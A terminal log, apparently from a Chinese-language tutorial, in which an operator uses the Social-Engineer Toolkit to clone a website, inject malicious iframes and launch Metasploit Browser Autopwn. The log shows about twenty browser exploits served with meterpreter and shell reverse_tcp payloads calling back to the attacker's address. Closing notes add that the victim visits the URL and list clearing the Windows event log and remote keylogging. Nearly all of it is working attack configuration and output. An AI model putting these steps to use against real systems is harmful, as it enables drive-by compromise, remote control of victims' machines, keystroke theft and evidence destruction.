[email protected]:~# setoolkit
Do you agree to the terms of service [y/n]:y
Select from the menu:
1)Social-Engineering Attacks
2)Penetration Testing (Fast-Track)
3)Third Party Modules
4)Update the Social-Engineer Toolkit
5)Update SET configuration
6)Help, Credits, and About
99)Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1)Spear-Phishing Attack Vectors
2)Website Attack Vectors
3)Infectious Media Generator
4)Create a Payload and Listener
5)Mass Mailer Attack
6)Arduino-Based Attack Vector
7)Wireless Access Point Attack Vector
8)QRCode Generator Attack Vector
9)Powershell Attack Vectors
10)SMS Spoofing Attack Vector
11)Third Party Modules
99)Return back to the main menu.
set> 2
1)Java Applet Attack Method
2)Metasploit Browser Exploit Method
3)Credential Harvester Attack Method
4)Tabnabbing Attack Method
5)Web Jacking Attack Method
6)Multi-Attack Web Method
7)Full Screen Attack Method
8)HTA Attack Method
99)Return to Main Menu
set:webattack>2
1)Web Templates
2)Site Cloner
3)Custom Import
99)Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in thecases where your SET machine is
[-] not externally exposed and may be adifferent IP address than your reverse listener.
set> Are you using NAT/Port Forwarding[yes|no]: no
[-] Enter the IP address of your interfaceIP or if your using an external IP, what
[-] will be used for the connection backand to house the web server (your interface address)
set:webattack> IP address or hostnamefor the reverse connection:192.168.1.117 (kali)
1.Java Required
2.Google
3.Facebook
4.Twitter
5.Yahoo
set:webattack> Select a template:1
Enter the browser exploit you would like touse [8]:
1)Adobe Flash Player ByteArray Use After Free (2015-07-06)
2)Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3)Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4)MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5)MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6)Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7)Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8)Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9)Java Applet JMX Remote Code Execution (2013-01-10)
10)MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11)Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12)Java 7 Applet Remote Code Execution (2012-08-26)
13)Microsoft Internet Explorer execCommand Use-After-Free Vulnerability(2012-09-14)
14)Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15)Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16)MS12-037 Internet Explorer Same ID Property Deleted Object Handling MemoryCorruption (2012-06-12)
17)Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18)Adobe Flash Player Object Type Confusion (2012-05-04)
19)Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
20)MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21)Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22)MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23)Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
24)Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute(2011-06-01)
25)Internet Explorer CSS Import Use After Free (2010-11-29)
26)Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27)Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28)Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29)Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30)Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31)Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32)Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33)Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow(2010-09-07)
34)Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35)Microsoft Help Center XSS and Command Execution (2010-06-09)
36)Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37)Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
38)Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39)Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40)Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41)Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42)Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43)Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44)FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45)FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46)Metasploit Browser Autopwn (USE AT OWN RISK!)
set:payloads>46
1)Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2)Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3)Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4)Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5)Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6)Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
7)Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
8)Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
9)Download/Run your Own Executable Downloads an executable and runs it
set:payloads>2
set:payloads> Port to use for thereverse [443]:443 (这里执行时间有点长)
[*]Cloning the website:
[*] This could take a little bit...
[*] Injecting iframes into cloned websitefor MSF Attack....
[*] Malicious iframe injectionsuccessful...crafting payload.
[*] Apache appears to be running, movingfiles into Apache‘s home
***************************************************
Web Server Launched. Welcome to the SET WebAttack.
***************************************************
[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in usefor performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Serveris now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() ||""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \‘\/\/\/‘/ |
| o O | )======( |
| o | .‘ LOOT ‘. |
||^^^^^^^^^^^^^^|l___ | / _||__ \ |
|| PAYLOAD |""\___, | / (_||_ \ |
||________________|__|)__| | | __||_) | |
||(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | ‘--------------‘ |
+---------------------------+---------------------------+
Taking notes in notepad? Have MetasploitPro track & report
your progress and findings -- learn more onhttp://rapid7.com/metasploit
=[ metasploit v4.12.23-dev ]
+ -- --=[ 1577 exploits - 907 auxiliary -272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8nops ]
+ -- --=[ Free Metasploit Pro trial:http://r-7.co/trymsp ]
[*] Processing /root/.set//meta_config forERB directives.
resource (/root/.set//meta_config)> useauxiliary/server/browser_autopwn
resource (/root/.set//meta_config)> setPAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> setLHOST 192.168.1.117
LHOST => 192.168.1.117
resource (/root/.set//meta_config)> setLPORT 443
LPORT => 443
resource (/root/.set//meta_config)> setURIPATH /
URIPATH => /
resource (/root/.set//meta_config)> setSRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> setExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)>exploit -j
[*] Auxiliary module running as backgroundjob
[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host192.168.1.117...
[*] ---
[*] Starting exploitandroid/browser/webview_addjavascriptinterface with payloadandroid/meterpreter/reverse_tcp
[*] Starting exploitandroid/browser/webview_addjavascriptinterface with payloadandroid/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XJyavBIacR
[*] Local IP:http://192.168.1.117:8080/XJyavBIacR
[*] Server started.
[*] Starting exploitmulti/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL:http://0.0.0.0:8080/QGlDpPXcx
[*] Local IP: http://192.168.1.117:8080/QGlDpPXcx
[*] Server started.
[*] Starting exploitmulti/browser/firefox_tostring_console_injection with payloadgeneric/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ARlpIFLe
[*] Local IP:http://192.168.1.117:8080/ARlpIFLe
[*] Server started.
[*] Starting exploitmulti/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL:http://0.0.0.0:8080/SOOmPaKWujh
[*] Local IP:http://192.168.1.117:8080/SOOmPaKWujh
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearraywith payload java/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/xGsBkydiyDEQ
[*] Local IP:http://192.168.1.117:8080/xGsBkydiyDEQ
[*] Server started.
[*] Starting exploitmulti/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/WtYy
[*] Local IP:http://192.168.1.117:8080/WtYy
[*] Server started.
[*] Starting exploitmulti/browser/java_jre17_provider_skeleton with payloadjava/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YRcEw
[*] Local IP:http://192.168.1.117:8080/YRcEw
[*] Server started.
[*] Starting exploitmulti/browser/java_jre17_reflection_types with payloadjava/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/XTCiGPcUSrL
[*] Local IP: http://192.168.1.117:8080/XTCiGPcUSrL
[*] Server started.
[*] Starting exploitmulti/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/bzfzBWGZjB
[*] Local IP:http://192.168.1.117:8080/bzfzBWGZjB
[*] Server started.
[*] Starting exploitmulti/browser/java_verifier_field_access with payloadjava/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/akFIwW
[*] Local IP:http://192.168.1.117:8080/akFIwW
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwritewith payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jFdeDrFt
[*] Local IP:http://192.168.1.117:8080/jFdeDrFt
[*] Server started.
[*] Starting exploitwindows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/ajEThoWib
[*] Local IP:http://192.168.1.117:8080/ajEThoWib
[*] Server started.
[*] Starting exploitwindows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oeredhZHxbFn
[*] Local IP:http://192.168.1.117:8080/oeredhZHxbFn
[*] Server started.
[*] Starting exploitwindows/browser/ie_cgenericelement_uaf with payloadwindows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/TIMDwI
[*] Local IP:http://192.168.1.117:8080/TIMDwI
[*] Server started.
[*] Starting exploitwindows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JjYZ
[*] Local IP:http://192.168.1.117:8080/JjYZ
[*] Server started.
[*] Starting exploitwindows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/sUtiNZGyAVn
[*] Local IP:http://192.168.1.117:8080/sUtiNZGyAVn
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerangewith payload windows/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/kpaPwyqlTXpvM
[*] Local IP:http://192.168.1.117:8080/kpaPwyqlTXpvM
[*] Server started.
[*] Starting exploitwindows/browser/ms13_080_cdisplaypointer with payloadwindows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/skqCsHFX
[*] Local IP:http://192.168.1.117:8080/skqCsHFX
[*] Server started.
[*] Starting exploitwindows/browser/ms13_090_cardspacesigninhelper with payloadwindows/meterpreter/reverse_tcp
[*] Using URL:http://0.0.0.0:8080/vUMSlRJDHh
[*] Local IP:http://192.168.1.117:8080/vUMSlRJDHh
[*] Server started.
[*] Starting exploitwindows/browser/msxml_get_definition_code_exec with payloadwindows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DTsZvlBS
[*] Local IP:http://192.168.1.117:8080/DTsZvlBS
[*] Server started.
[*] Starting handler forwindows/meterpreter/reverse_tcp on port 3333
[*] Starting handler forgeneric/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on192.168.1.117:3333
[*] Starting the payload handler...
[*] Starting handler forjava/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on192.168.1.117:6666
[*] Started reverse TCP handler on192.168.1.117:7777
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] --- Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.117:8080/
[*] Server started. (服务已经启动)(回车)
客户端访问http://192.168.1.117:8080/
清理windows event log
远程键盘监控
exit -y 退出所有服务。